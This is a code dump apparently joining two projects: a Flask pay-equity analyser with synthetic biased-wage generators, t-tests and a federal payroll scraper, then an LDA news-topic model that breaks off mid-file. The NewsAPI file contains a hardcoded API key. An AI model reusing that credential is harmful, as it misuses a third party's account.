def samplefunction():
    """Render the jobs detail page; currently only echoes the posted form."""
    print(request.form)
    return render_template('/pages/moreInfoJobs.html')
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
import csvparser
from subprocess import Popen
success = Blueprint('success', __name__, template_folder='templates')

@success.route('/success', methods=['GET', 'POST'])
def upload_file():
    """Accept an uploaded CSV, save it under uploads/, and kick off analysis.

    Analysis runs asynchronously in a subprocess (lib/dataHandler.py), which
    writes its results as a JSON blob for the dashboard controllers to read.
    """
    import os
    if request.method == 'POST':
        f = request.files['file']
        # SECURITY fix: keep only the base name so a crafted filename such as
        # '../../etc/x' cannot escape the uploads/ directory.
        safe_name = os.path.basename(f.filename)
        f.save('uploads/' + safe_name)
        Popen(['python', 'lib/dataHandler.py', 'uploads/' + safe_name])
        return render_template('forms/success.html', name=safe_name)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
upload = Blueprint('upload', __name__, template_folder='templates')

@upload.route('/upload')
def show():
    """Serve the upload form page."""
    return render_template('pages/upload.html')
--- FILE SEPARATOR ---
import csv
import random
from lib import Gender, Job, Race
"""
Generates a CSV file of sample size N.
input:
N- the sample size
Sample_instructions: a dictionary with instructions on how to bias people
{
key- the metric to be unfair about:
value - a dictionary{
key- the group in question:
value- a number that indicates skew. eg 1.15 > 15% higher pay
}
}
global_mean- a global average that is the relative comparison for all individual groups
global_std- a global std for all.
"""
def generateCSV(sample_size, sample_instructions, global_mean, global_std):
    """Generate `sample_size` synthetic people biased per `sample_instructions`.

    One random choice per factor; each choice's multiplier skews the person's
    expected wage around global_mean. See the module comment above for the
    instruction-dict shape.
    """
    # NOTE(review): this makes the first elements of `answer` the bare header
    # *strings* ('race', 'gender', ..., 'wage') followed by row lists, and
    # createCSV() writes its own, different 5-column header. csv.writerow on a
    # bare string splits it into characters, so sampledata.csv's leading rows
    # look broken -- confirm intent before relying on the file.
    answer = list(sample_instructions) + ["wage"]
    for person in range(sample_size):
        person_attributes = []
        weighed_mean = global_mean
        for discriminating_factor in list(sample_instructions):
            factor_types = sample_instructions[discriminating_factor]
            selected_attribute = random.choice(list(factor_types))
            # skew this person's expected wage by the chosen group's multiplier
            weighed_mean *=factor_types[selected_attribute]
            person_attributes += [selected_attribute]
        # gaussian wage around the skewed mean, truncated to cents
        person_attributes += [int(100*random.gauss(weighed_mean, global_std))/100]
        answer.append(person_attributes)
    createCSV(answer)
    return answer
def createCSV(lists):
    """Write `lists` to sampledata.csv beneath a fixed five-column header."""
    with open('sampledata.csv', 'w', newline='') as out:
        writer = csv.writer(out)
        writer.writerow(['race', 'gender', 'job', 'year', 'salary'])
        writer.writerows(lists)
# Demo bias profile: per-group multipliers applied to the global mean wage.
instruction = {
    'race' : {
        'white': 1.5,
        'black': 1,
        'asian': 1.3,
        'latino': 0.8,
        'indigenous': .8,
        'pacific': .9,
    },
    'gender' : {
        'male': 1,
        'female': 0.73,
    },
    'job' : {
        'Alcohol Beverage Purchasing Specialist': .5,
        'deputy sheriff': 1,
        'sheriff': 1.5,
        'Executive': 10
    }
}

# Runs at import time: generate 1500 people around a $100k mean, $10k std,
# write them to sampledata.csv, and echo each row.
for person in generateCSV(1500, instruction, 100000, 10000):
    print (person)
--- FILE SEPARATOR ---
import csv
def parseCSV(file_name):
    """Read `file_name` as CSV and return its rows as a list of lists.

    Also prints the parsed rows (kept for parity with the original debug
    output). Fix: removed the unreachable statements that followed the
    return and referenced `csv_data`, a name that only existed in a
    commented-out line (they would have raised NameError if ever reached).
    """
    rows = []
    with open(file_name, 'r') as file_o_data:
        for row in csv.reader(file_o_data):
            rows.append(row)
    print(rows)
    return rows
"""
Takes DATA, an iterable, and sorts the DATA by the
COLUMN_SORT and returns it as a dictionary where each different type
in COLUMN_GROUP has its relevant COLUMN_SORTs listed as a dictionary value.
"""
def sort_by(data, column_sort, column_group):
    """Group the COLUMN_SORT values of DATA by each distinct COLUMN_GROUP value.

    data[0] must be the header row. Returns {group_value: [sort_values...]},
    or an error string when either column name is missing from the header.
    """
    assert len(data)>1, "There is no data in the file!"
    header = data[0]
    rows = data[1:]
    try:
        group_ind = header.index(column_group)
        sort_ind = header.index(column_sort)
    except ValueError:
        return "Error: the request is not represented by the data"
    grouped = {}
    for row in rows:
        grouped.setdefault(row[group_ind], []).append(row[sort_ind])
    return grouped
# test_data = [['money', 'race'], [-100, 'white'], [25000, 'asian'], [26000, 'asian'], [1000000, 'egyptian'], [1000, 'white']]
# sorted_test_data = sort_by(test_data, "money", "race")
"""
filter_group takes in a dataset and column to filter by (creating something like a "race-filter",
then takes in a name of the grouped variable (e.g. white))
filtergroup (test_data, race)(white)
>>> [[-100, 'white'], [1000, 'white']]
"""
# filter_group = lambda dataset, col: lambda var: list(filter (lambda row: row[dataset[0].index(col)] == var, dataset))
# print(filter_group(test_data, "race")("asian"))
def mean_data(sorted_data):
    """Map each group in `sorted_data` to the arithmetic mean of its values.

    Bug fix: the original iterated the module-level `sorted_test_data`
    (commented out above) instead of its own argument, so calling it raised
    NameError regardless of input.
    """
    return {grouper: (sum(values)/len(values)) for grouper, values in sorted_data.items()}
# print(mean_data(test_data))
"""
Filters a CSV into several Lists, currently supported lists are categories, gender (index 0), annualSalary(index 1), Employee Title (index 2), and race (index 3)
"""
def filterCSV(file_name):
    """Split a payroll CSV into column lists: [gender, annualSalary, employeeTitle, race].

    Column positions are discovered from the header row; columns absent from
    the header simply yield empty lists. NOTE(review): header names are
    matched case-sensitively against lower-case strings -- assumes the input
    header is already lower-case; confirm against the upload pipeline.
    """
    with open(file_name, 'r') as file_o_data:
        csv_data = csv.reader(file_o_data) #gives an iterable
        categories = []
        gender = []
        annualSalary = []
        race = []
        employeeTitle = []
        #gender:annual salary
        # first row is the header; collect the column names
        for specData in next(csv_data):
            categories.append(specData)
        print(categories)
        for datapoint in csv_data:
            # walk each cell, tracking its column index manually
            index = 0
            for specificData in datapoint:
                #print(specificData)
                if ("gender" in categories and index == categories.index("gender")):
                    gender.append(specificData)
                elif ("current annual salary" in categories and index == categories.index("current annual salary")):
                    annualSalary.append(specificData)
                elif ("race" in categories and index == categories.index("race")):
                    race.append(specificData)
                # the job-title column may appear under several header names
                if ("employee position title" in categories or "position title" in categories or "job" in categories):
                    if ("employee position title" in categories):
                        if (index == categories.index("employee position title")):
                            employeeTitle.append(specificData)
                    elif ("position title" in categories):
                        if (index == categories.index("position title")):
                            employeeTitle.append(specificData)
                    elif ("job" in categories):
                        if (index == categories.index("job")):
                            employeeTitle.append(specificData)
                #elif (index == categories.index("Employee Position Title") or index == categories.index("Position Title")):
                #    employeeTitle.append(specificData)
                index += 1
    return [gender, annualSalary, employeeTitle, race]
#gender = 'M' or 'F'
def genderSalaryAVG(arr, seekGender):
    """Average annual salary for one gender ('M' or 'F').

    arr is filterCSV()'s output: [gender, annualSalary, employeeTitle, race].
    Prints and returns the truncated average as a string; returns None for
    invalid input or when no matching rows carry a salary (the original
    crashed with ZeroDivisionError in that case).
    """
    gender, annualSalary = arr[0], arr[1]
    if seekGender not in ('M', 'F') or gender == []:
        return None
    totalAnn = 0
    count = 0
    # gender/salary are parallel lists; blank salaries are skipped
    for g, salary in zip(gender, annualSalary):
        if g.lower() == seekGender.lower() and salary != '':
            totalAnn += float(salary)
            count += 1
    if count == 0:
        return None
    print("Average annual salary for gender: "+seekGender+", is "+(str(int(totalAnn/count))))
    return (str(int(totalAnn/count)))
def raceAVG(arr, seekRace):
    """Average annual salary for one race value (same contract as genderSalaryAVG).

    arr is filterCSV()'s output: [gender, annualSalary, employeeTitle, race].
    Prints and returns the truncated average as a string; returns None for
    empty input or when no matching rows carry a salary (the original
    crashed with ZeroDivisionError in that case).
    """
    race, annualSalary = arr[3], arr[1]
    if seekRace == [] or race == [] or annualSalary == []:
        return None
    totalAnn = 0
    count = 0
    # race/salary are parallel lists; blank salaries are skipped
    for r, salary in zip(race, annualSalary):
        if r.lower() == seekRace.lower() and salary != '':
            totalAnn += float(salary)
            count += 1
    if count == 0:
        return None
    print("Average annual salary for race: "+seekRace+", is "+(str(int(totalAnn/count))))
    return (str(int(totalAnn/count)))
--- FILE SEPARATOR ---
from enum import Enum
class DataSections(Enum):
    """Column indices of a parsed payroll row.

    Matches splitCols()'s output order in dataHandler: race, gender, job,
    year, salary -- SENIORITY maps to the 'year' column there.
    """
    RACE = 0
    GENDER = 1
    JOB = 2
    SENIORITY = 3
    SALARY = 4
--- FILE SEPARATOR ---
from enum import Enum
class Gender(Enum):
    """Gender codes used in the generated/parsed datasets (0=male, 1=female)."""
    MALE = 0
    FEMALE = 1
--- FILE SEPARATOR ---
from enum import Enum
class Job(Enum):
    """Job-category codes used in the generated datasets."""
    JANITOR = 0
    CASHIER = 1
    ENGINEER = 2
    EXECUTIVE = 3
--- FILE SEPARATOR ---
# Imports
from numpy import loadtxt
from keras.models import Sequential
from keras.layers import Dense
def Learn():
    """Build, train, and evaluate a small dense Keras network on generated.csv.

    The first three CSV columns are the features; the fourth is the binary
    label. Prints the training-set accuracy when done.
    """
    num_inputs = 3
    dataset = loadtxt('generated.csv', delimiter=',')
    features = dataset[:, 0:num_inputs]
    labels = dataset[:, num_inputs]
    net = Sequential()
    net.add(Dense(12, input_dim=num_inputs, activation='relu'))
    net.add(Dense(8, activation='relu'))
    net.add(Dense(1, activation='sigmoid'))
    net.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
    net.fit(features, labels, epochs=150, batch_size=10)
    # evaluate on the same data (training accuracy)
    _, accuracy = net.evaluate(features, labels)
    print('Accuracy: %2.f' % (accuracy * 100))
def main():
    """Placeholder entry point; Learn() is deliberately not invoked."""
    print("Learn has been activited! It should do nothing.")

main()
--- FILE SEPARATOR ---
from enum import Enum
class Race(Enum):
    """Race codes used in the generated/parsed datasets."""
    WHITE = 0
    BLACK = 1
    ASIAN = 2
    LATINO = 3
    INDIGENOUS = 4
    PACIFIC = 5
--- FILE SEPARATOR ---
from . import csvTasks
from . import Gender
# from . import Learn
--- FILE SEPARATOR ---
import Gender
Gender = Gender.Gender
import Job
Job = Job.Job
import Race
Race = Race.Race
import DataSections
DataSections = DataSections.DataSections
import disparitySearch
import dataHandler
--- FILE SEPARATOR ---
import csv
import random
import math
# Biased profile: per-group multipliers applied to the global mean wage.
instruction = {
    'race' : {
        0: 1.5, # White
        1: .9, # Black
        2: 1.2, # Asian
        3: 0.8, # Latino
        4: .7, # Indigenous
        5: .8, # Pacific
    },
    'gender' : {
        0: 1, # Male
        1: 0.83, # Female
    },
    'job' : {
        0: .5, # Janitor
        1: 1, # Cashier
        2: 1.5, # Engineer
        3: 10 # Executive
    },
    # NOTE(review): the job names on these 'year' entries look like a
    # copy-paste leftover; keys 0-3 are seniority/year bands, not jobs.
    'year' : {
        0: 0.8,
        1: 0.9,
        2: 0.95,
        3: 1
    }
}

# Unbiased control profile: race/gender/job multipliers are all 1, so only
# the year band affects pay.
test_instruction = {
    'race' : {
        0: 1, # White
        1: 1, # Black
        2: 1, # Asian
        3: 1, # Latino
        4: 1, # Indigenous
        5: 1, # Pacific
    },
    'gender' : {
        0: 1, # Male
        1: 1, # Female
    },
    'job' : {
        0: 1, # Janitor
        1: 1, # Cashier
        2: 1, # Engineer
        3: 1 # Executive
    },
    'year' : {
        0: 1,
        1: 1.2,
        2: 2,
        3: 5
    }
}
def parse(file):
    """Return all rows of CSV `file` as a list of lists.

    Bug fix: the original returned the csv.reader object itself; by the time
    a caller iterated it, the `with` block had already closed the file, so
    iteration raised "I/O operation on closed file". Materializing the rows
    while the file is open fixes that; callers that merely iterate the
    result are unaffected.
    """
    with open(file, 'r') as data:
        return list(csv.reader(data))
def generateCSV(sample_size, sample_instructions, global_mean, global_std):
    """Create `sample_size` rows of biased synthetic pay data and persist them.

    For each person: one random choice per factor, each choice's multiplier
    skewing the wage mean; the wage is a gaussian draw floored to a
    non-negative integer. Rows are written via createCSV() and returned.
    """
    people = []
    for _ in range(sample_size):
        row = []
        mean_for_person = global_mean
        for factor in sample_instructions:
            options = sample_instructions[factor]
            choice = random.choice(list(options))
            mean_for_person *= options[choice]
            row.append(choice)
        wage = math.floor(abs(int(100 * random.gauss(mean_for_person, global_std)) / 100))
        row.append(wage)
        people.append(row)
    createCSV(people)
    return people
def createCSV(lists):
    """Dump `lists` to rlyunfairsampledata.csv beneath a fixed header."""
    with open('rlyunfairsampledata.csv', 'w', newline='') as sink:
        writer = csv.writer(sink)
        writer.writerow(['race', 'gender', 'job', 'salary'])
        writer.writerows(lists)
def main():
    """Generate the 1500-person biased demo dataset and echo each row."""
    for row in generateCSV(1500, instruction, 100000, 10000):
        print(row)
--- FILE SEPARATOR ---
import csv
import json
import math
import statistics
import sys
from scipy import stats
import numpy as np
import random
sys.path.append('lib')
import Gender
Gender = Gender.Gender
import Job
Job = Job.Job
import Race
Race = Race.Race
import DataSections
DataSections = DataSections.DataSections
def parse(file_name):
    """Read a CSV into a list of rows, skipping the header row.

    For files with "MONT" in the name, the row is rebuilt as
    [race, is_female, job, year, salary] where race/job/year are *random*
    codes -- only the gender flag (column 1 == "F") and salary (column 2)
    come from the data. NOTE(review): presumably a Montgomery-County payroll
    demo hack; it makes those runs non-deterministic and truncates to ~200
    rows. Confirm before trusting MONT results.
    """
    data = []
    with open(file_name, 'r') as file:
        for row in csv.reader(file):
            data.append(row)
    if "MONT" in file_name:
        mapfn = lambda data_entry: [random.randint(0, 5), int(data_entry[1] == "F"), random.randint(0, 3), random.randint(0,6), int(float(data_entry[2]))]
        new_data = [datapoint for datapoint in map(mapfn,data[1:])]
        # [1:200] also drops the first mapped row in addition to the header
        return new_data[1:200]
    return data[1:]
def splitCols(data):
    """Split parsed rows into per-column lists: (race, gender, job, year, salary).

    Every field is coerced to int except job, which stays as-is when it is
    not numeric.
    """
    race, gender, job, year, salary = [], [], [], [], []
    for row in data:
        race.append(int(row[0]))
        gender.append(int(row[1]))
        try:
            job.append(int(row[2]))
        except ValueError:
            job.append(row[2])
        year.append(int(row[3]))
        salary.append(int(row[4]))
    return race, gender, job, year, salary
def singleFilter(labels, values, criteria):
    """Select the entries of `values` whose matching `labels` entry equals `criteria`.

    `labels` and `values` are parallel lists; order is preserved. Raises
    IndexError if `values` is shorter than `labels` (as before).
    """
    return [values[i] for i, label in enumerate(labels) if label == criteria]
def mean(lst):
    """Arithmetic mean of a non-empty numeric list."""
    total = sum(lst)
    return total / len(lst)
def meanOf(labels, values, criteria):
    """Mean of the `values` entries whose parallel `labels` entry equals `criteria`."""
    matching = singleFilter(labels, values, criteria)
    return sum(matching) / len(matching)
# Find standard deviation
def sigma(lst):
    """Sample standard deviation of `lst` (delegates to statistics.stdev)."""
    return statistics.stdev(lst)
# Find standard deviation of criteria
def sigmaOf(labels, values, criteria):
    """Sample standard deviation of the `values` entries matching `criteria`."""
    matching = singleFilter(labels, values, criteria)
    return statistics.stdev(matching)
# Returns the percentage of criteria in a list
def ratio(lst, criteria):
    """Fraction (0.0-1.0) of `lst` entries equal to `criteria`."""
    matches = sum(1 for item in lst if item == criteria)
    return matches / len(lst)
def unique(lst):
    """Order-preserving de-duplication of `lst` (first occurrence wins)."""
    return [*dict.fromkeys(lst)]
# Generate a dashboard summary
def dashSum(ppl, job, salary):
    """Dashboard summary: (headcount, %% male, floor(mean salary), distinct jobs)."""
    headcount = len(ppl)
    pct_male = 100 * ratio(ppl, Gender.MALE.value)
    avg_salary = math.floor(mean(salary))
    distinct_jobs = len(unique(job))
    return headcount, pct_male, avg_salary, distinct_jobs
def findAllT(race, gender, job, year, salary):
    """Pairwise t-tests on salary between groups of race, gender, and job.

    Returns {'race': {...}, 'gender': {...}, 'job': {...}} where each inner
    dict maps (a+1)*(b+1) -- for group indices a < b -- to the scipy
    ttest_ind result. NOTE(review): that product key is not unique (e.g.
    race pairs (0,5) and (1,2) both map to 6), so some pairs overwrite
    earlier ones; downstream code indexes these keys, so it is documented
    rather than changed here.
    """
    allT = {}
    allT['race'] = {}
    for r in range(len(Race)):
        for i in range(r + 1, len(Race)):
            raceListA = singleFilter(race, salary, r)
            raceListB = singleFilter(race, salary, i)
            allT['race'][(r + 1) * (i + 1)] = stats.ttest_ind(raceListA, raceListB)
    allT['gender'] = {}
    for g in range(len(Gender)):
        for i in range(g + 1, len(Gender)):
            genderListA = singleFilter(gender, salary, g)
            genderListB = singleFilter(gender, salary, i)
            allT['gender'][(g + 1) * (i + 1)] = stats.ttest_ind(genderListA, genderListB)
    allT['job'] = {}
    for j in range(len(Job)):
        for i in range(j + 1, len(Job)):
            print(i, j)  # leftover debug output
            jobListA = singleFilter(job, salary, j)
            jobListB = singleFilter(job, salary, i)
            print (jobListA, jobListB)  # leftover debug output
            print('endtest')
            allT['job'][(j + 1) * (i + 1)] = stats.ttest_ind(jobListA, jobListB)
    return allT
def pt_score_calc(data1, data2):
    """Welch's t statistic between two samples (sample stdev, unequal variances)."""
    var_term_1 = (sigma(data1) ** 2) / len(data1)
    var_term_2 = (sigma(data2) ** 2) / len(data2)
    mean_diff = mean(data1) - mean(data2)
    return mean_diff / math.sqrt(var_term_1 + var_term_2)
def search_disparity(data, col, first, second):
    """t-score between salary groups `first` and `second` of column `col` in CSV `data`.

    A negative `second` compares `first` against the entire salary column.
    """
    columns = splitCols(parse(data))
    salaries = columns[DataSections.SALARY.value]
    group_a = singleFilter(columns[col.value], salaries, first)
    if second > -1:
        group_b = singleFilter(columns[col.value], salaries, second)
    else:
        group_b = salaries
    return pt_score_calc(group_a, group_b)
"""Takes an interable and finds all possible, non duplicating possible pairs
returns: a list of tuples
"""
def generate_combinations(iterable):
    """All unordered, non-repeating pairs from `iterable`, as a list of tuples.

    Pair exclusion uses identity (`is not`), matching the original -- this is
    intended for enum members and other singleton-like items.
    """
    pairs = []
    seen = []
    for first in iterable:
        for second in iterable:
            if second not in seen and second is not first:
                pairs.append((first, second))
        seen.append(first)
    return pairs
"""
def complete_data_analysis(datasetURL):
else:
results = {}
#binary gender analysis
results[(Gender.MALE, Gender.FEMALE)] = search_disparity('sampledata.csv', DataSections.GENDER, Gender.MALE.value, Gender.FEMALE.value)
#race analysis
for combination in generate_combinations(Race):
results[combination] = search_disparity(datasetURL, DataSections.RACE, combination[0].value, combination[1].value )
#job analysis
for combination in generate_combinations(Job):
results[combination] = search_disparity(datasetURL, DataSections.JOB, combination[0].value, combination[1].value )
return results
"""
def main():
    """End-to-end analysis of the CSV named in sys.argv[1].

    Parses the file, computes summary stats, gender/race p-values, and a list
    of plain-English recommendations, then writes everything as a JSON blob
    under blobs/ for the dashboard controllers to serve.

    Bug fix: the women-favoring branch called `str2(...)` -- a NameError
    whenever ratio < 45; it is now `str(...)` like its sibling branch.
    """
    print("Begun handling of data with", sys.argv)
    argumentList = sys.argv[1:]
    data = parse(argumentList[0])
    # column order: ['race', 'gender', 'job', 'year', 'salary']
    race, gender, job, year, salary = splitCols(data)
    count, ratio, meanTc, jobs = dashSum(gender, job, salary)
    maleSalary = singleFilter(gender, salary, Gender.MALE.value)
    maleSalary = sum(maleSalary) / len(maleSalary)
    femaleSalary = singleFilter(gender, salary, Gender.FEMALE.value)
    femaleSalary = sum(femaleSalary) / len(femaleSalary)
    print(maleSalary)
    print(femaleSalary)
    allT = findAllT(race, gender, job, year, salary)
    print(allT)
    # key 2 = the (MALE, FEMALE) pair; [1] = the p-value of the t-test result
    p_val_g = abs(allT["gender"][2][1])
    # NOTE(review): this indexes [1] into the *list* of race results and then
    # takes min() over that single (statistic, pvalue) pair -- probably not
    # the intended "smallest race p-value". Preserved to keep the blob schema
    # stable for the dashboard.
    p_val_race = abs(min([allT['race'][key] for key in allT['race']][1]))
    print("p vals", p_val_g, p_val_race)
    recommendations = []
    if (ratio < 45):
        recommendations.append("Your company favors women in the hiring process (by about "+(str(2*abs(float(50 - ratio))))+"%)! Try to balance out your company!")
    elif (ratio > 55):
        recommendations.append("Your company favors men in the hiring process (by about "+(str(2*abs(float(50 - ratio))))+"%)! Try to balance out your company!")
    else:
        recommendations.append("Fantastic job in maintaining a balance of both men and women in your workplace! Keep it up.")
    if (jobs < 10):
        recommendations.append("Your company is lacking a diverse set of jobs. Try to compartamentalize your employees' duties more!")
    elif (jobs >= 10):
        recommendations.append("Great job maintaining a diverse set of jobs for your employees!")
    if (maleSalary - femaleSalary > 9000):
        recommendations.append("Your company has a bias when it comes to paying men over women. (A difference of $"+str(abs(int(femaleSalary - maleSalary)))+") Try to balance out your payrolls!")
    elif (femaleSalary - maleSalary > 9000):
        recommendations.append("Your company has a bias when it comes to paying women over men. (A difference of $"+str(abs(int(femaleSalary - maleSalary)))+") Try to balance out your payrolls!")
    else:
        recommendations.append("Great job maintaing balanced and equal payrolls for all of your employees!")
    dump = {
        "count": count,
        "ratio": ratio,
        "meanTc": meanTc,
        "jobs": jobs,
        "t_vals": allT,
        "p_val_g": p_val_g,
        "p_val_race": p_val_race,
        "feedback": recommendations,
    }
    # [7:-3] strips 'uploads' and the trailing 'csv'; the resulting
    # 'blobs//name.json' double slash is harmless and matches what
    # dashboardItem reads back.
    with open('blobs/' + argumentList[0][7:-3] + "json", 'w') as file:
        json.dump(dump, file)
    print("[dataHandler] saved!")
# Run the pipeline only when a dataset path was passed on the command line.
# (An argv check rather than __main__: this module is also star-imported by
# the Flask controllers, where sys.argv belongs to the web server.)
if len(sys.argv) > 1:
    main()
--- FILE SEPARATOR ---
import csv
from datetime import datetime
import json
import requests
from time import sleep
# Scrape fedsdatacenter.com's paginated federal payroll table into a
# timestamped CSV, 100 records per request, sleeping periodically so the
# server is not hammered.
url_prepend = "https://www.fedsdatacenter.com/federal-pay-rates/output.php?sColumns=,,,,,,,,&iDisplayStart="
url_append = "&iDisplayLength=100"
payload = {}
headers = {}

today = datetime.today()
date = str(today.year) + "-" + str(today.month) + \
    "-" + str(today.day) + "-" + str(today.hour) + str(today.minute)

start = 12300   # resume point from a previous partial run
end = 21083
pages = 21083

# Fix: the output file was opened and never closed, so buffered rows could be
# lost if a request failed mid-run; the with-block guarantees flush/close.
with open('FedsDataCenter-' + date + '.csv', 'w', newline='') as table:
    writer = csv.writer(table, delimiter=',')
    writer.writerow(['name', 'grade', 'plan', 'salary', 'bonus', 'agency', 'location', 'occupation', 'fy'])
    for i in range(start, end):
        print("Downloading page", i + 1, "of", pages, "...", end=" ")
        url = url_prepend + str(i * 100) + url_append
        response = requests.request("GET", url, headers=headers, data=payload)
        parsed = json.loads(response.text.encode('utf8'))
        for item in parsed['aaData']:
            writer.writerow(item)
        print("Done!")
        # throttle: long pause every 1000 pages, short pause every 100
        if (i + 1) % 1000 == 0:
            print("Sleeping for a half minute...")
            sleep(30)
            continue
        if (i + 1) % 100 == 0:
            print("Sleeping for a 5 seconds...")
            sleep(5)
            continue
|
[
"/controllers/__init__.py",
"/controllers/dashboard.py",
"/controllers/dashboardItem.py",
"/controllers/home.py",
"/controllers/manage.py",
"/controllers/moreInfoJobs.py",
"/controllers/success.py",
"/controllers/upload.py",
"/csvgenerator.py",
"/csvparser.py",
"/lib/DataSections.py",
"/lib/Gender.py",
"/lib/Job.py",
"/lib/Learn.py",
"/lib/Race.py",
"/lib/__init__.py",
"/lib/completeDataAnalysis.py",
"/lib/csvTasks.py",
"/lib/dataHandler.py",
"/payroll-datasets/scripts/FedsDataCenter.py"
] |
00-00-00-11/News-Suggestions-Using-ML
|
from tqdm import tqdm
import numpy as np
import random, math, time
from scipy.special import psi
from preprocessing import preprocessing, maxItemNum
from retrieve_articles import retrieve_articles
docs, word2id, id2word = preprocessing()

# The number of documents we'll be using to train the model.
N = len(docs)
# number of distinct terms
M = len(word2id)
# number of topics
T = 10
# iteration times of variational inference, judgment of the convergence by calculating likelihood is omitted
iterInference = 35
# iteration times of variational EM algorithm, judgment of the convergence by calculating likelihood is omitted
iterEM = 50
# initial value of hyperparameter alpha
alpha = 5
# sufficient statistic of alpha
alphaSS = 0
# the topic-word distribution (beta in D. Blei's paper)
# Passing the list [T,M] in as an argument for np.zeros creates a matrix of T-by-M zeros.
varphi = np.zeros([T, M])
# topic-word count, this is a sufficient statistic to calculate varphi
nzw = np.zeros([T, M])
# topic count, sum of nzw with w ranging from [0, M-1], for calculating varphi
nz = np.zeros([T])
# inference parameter gamma (document-topic Dirichlet), one row per document
gamma = np.zeros([N, T])
# inference parameter phi (word-topic), sized to the longest document
phi = np.zeros([maxItemNum(N, docs), T])
def initializeLdaModel():
    """Seed the topic-word counts with small random mass, then derive varphi."""
    for topic in range(T):
        for word in range(M):
            nzw[topic, word] += 1.0 / M + random.random()
            nz[topic] += nzw[topic, word]
    updateVarphi()
# update model parameters : varphi (the update of alpha is ommited)
def updateVarphi():
    """Recompute log topic-word probabilities varphi from the counts nzw/nz."""
    for topic in range(T):
        for term in range(M):
            count = nzw[topic, term]
            # log p(w|z) = log(count) - log(topic total); empty cells are
            # floored at -100 as a stand-in for log(0).
            if count > 0:
                varphi[topic, term] = math.log(count) - math.log(nz[topic])
            else:
                varphi[topic, term] = -100
# update variational parameters : gamma and phi
def variationalInference(docs, d, gamma, phi):
    """Run mean-field variational inference for document *d*.

    Updates gamma[d] (per-document topic weights) and phi (per-term topic
    responsibilities) in place, reading the current global varphi and alpha.
    """
    phisum = 0
    # One slot per topic, reused across terms.
    oldphi = np.zeros([T])
    digamma_gamma = np.zeros([T])
    # Initialization: uniform phi and the standard gamma = alpha + Nd/T seed.
    for z in range(0, T):
        gamma[d][z] = alpha + docs[d].wordCount * 1.0 / T
        digamma_gamma[z] = psi(gamma[d][z])
        for w in range(0, len(docs[d].itemIdList)):
            phi[w, z] = 1.0 / T
    # Fixed number of coordinate-ascent sweeps (no likelihood-based stopping).
    for iteration in tqdm(range(0, iterInference)):
        for w in range(0, len(docs[d].itemIdList)):
            phisum = 0
            for z in range(0, T):
                oldphi[z] = phi[w, z]
                # Work in log space: log phi ∝ digamma(gamma) + log varphi.
                phi[w, z] = digamma_gamma[z] + varphi[z, docs[d].itemIdList[w]]
                # Running log-sum-exp over topics for normalization.
                if z > 0:
                    phisum = math.log(math.exp(phisum) + math.exp(phi[w, z]))
                else:
                    phisum = phi[w, z]
            for z in range(0, T):
                # Normalize phi back to probability space, then fold the
                # change into gamma weighted by the term's count.
                phi[w, z] = math.exp(phi[w, z] - phisum)
                gamma[d][z] = gamma[d][z] + docs[d].itemCountList[w] * (phi[w, z] - oldphi[z])
                digamma_gamma[z] = psi(gamma[d][z])
# ---- driver: variational EM training, then topic reporting ----

# initialization of the model parameter varphi, the update of alpha is omitted
initializeLdaModel()
print("Checkpoint") #Track Preprocessing Progress

# variational EM Algorithm: the E-step fits gamma/phi per document, the
# M-step re-estimates varphi from the accumulated sufficient statistics.
for iteration in tqdm(range(0, iterEM)):
    nz = np.zeros([T])
    nzw = np.zeros([T, M])
    alphaSS = 0
    # EStep
    for d in tqdm(range(0, N)):
        variationalInference(docs, d, gamma, phi)
        gammaSum = 0
        for z in range(0, T):
            gammaSum += gamma[d, z]
            alphaSS += psi(gamma[d, z])
        alphaSS -= T * psi(gammaSum)
        # Accumulate topic-word sufficient statistics weighted by phi.
        for w in range(0, len(docs[d].itemIdList)):
            for z in range(0, T):
                nzw[z][docs[d].itemIdList[w]] += docs[d].itemCountList[w] * phi[w, z]
                nz[z] += docs[d].itemCountList[w] * phi[w, z]
    # MStep
    updateVarphi()

# calculate the top terms of each topic
topicwords = []
maxTopicWordsNum = 10
for z in range(0, T):
    # argsort is ascending; inserting at index 0 reverses to descending.
    ids = varphi[z, :].argsort()
    topicword = []
    for j in ids:
        topicword.insert(0, id2word[j])
    # FIX: use the named constant instead of the hard-coded literal 10, so
    # changing maxTopicWordsNum actually takes effect.
    # NOTE(review): the trailing `j` (the id of the lowest-ranked term) is
    # stored alongside the words but never read downstream — kept as-is.
    topicwords.append([topicword[0 : min(maxTopicWordsNum, len(topicword))], j])

counter = 1
for item in topicwords:
    print(f"Topic {counter}: {item[0]}")
    counter += 1
#print(phi)
print('Complete.')

# Write results to file: topic summaries first, then related news articles
# fetched per topic (the sleep keeps within the NYT API rate limit).
with open("results.txt","w+") as file:
    for index, item in enumerate(topicwords):
        file.write(f"Topic {index+1}: {item[0]} \n")
    for item in topicwords:
        file.write('\n'+' '.join(item[0])+'\n')
        query = ' '.join(item[0])
        file.write(retrieve_articles(query))
        time.sleep(5)
--- FILE SEPARATOR ---
from newsapi import NewsApiClient
# Init
def retrieve_articles_newsapi():
    """Query NewsAPI with hard-coded topic keywords and print every match.

    Demo/experimental: results are printed, not returned.
    """
    # SECURITY NOTE(review): this API key is committed in source; it should
    # be moved to an environment variable and the exposed key revoked.
    newsapi = NewsApiClient(api_key='2050df7a6a014501a04c5f42fa6eef54')
    # /v2/top-headlines
    top_headlines = newsapi.get_top_headlines(q='sector OR big OR corporate OR product OR investor OR pointed OR gavekal OR sovereign OR vincent OR louis',
                                              sources='bbc-news,the-verge',
                                              language='en')
    # /v2/everything — fixed date window; only this result set is printed below.
    all_articles = newsapi.get_everything(q='reality OR long OR central OR capital OR political OR dollars OR trading OR algorithmic OR banks OR released',
                                          sources='bbc-news, the-verge, the-wall-street-journal, the-washington-post, the-hill',
                                          domains='bbc.co.uk, techcrunch.com, ft.com, economist.com, wsj.com, thewashingtonpost.com',
                                          from_param='2019-07-18',
                                          to='2019-08-12',
                                          language='en',
                                          sort_by='relevancy')
    # /v2/sources
    sources = newsapi.get_sources()
    # top_headlines and sources are fetched but currently unused.
    for article in all_articles['articles']:
        print(article)
        print('\n')

# Runs at import time.
retrieve_articles_newsapi()
--- FILE SEPARATOR ---
from tqdm import tqdm
from split_into_sentences import split_into_sentences
import numpy as np
import codecs, jieba, re, random, math
from scipy.special import psi
# wordCount : the number of total words (not terms)
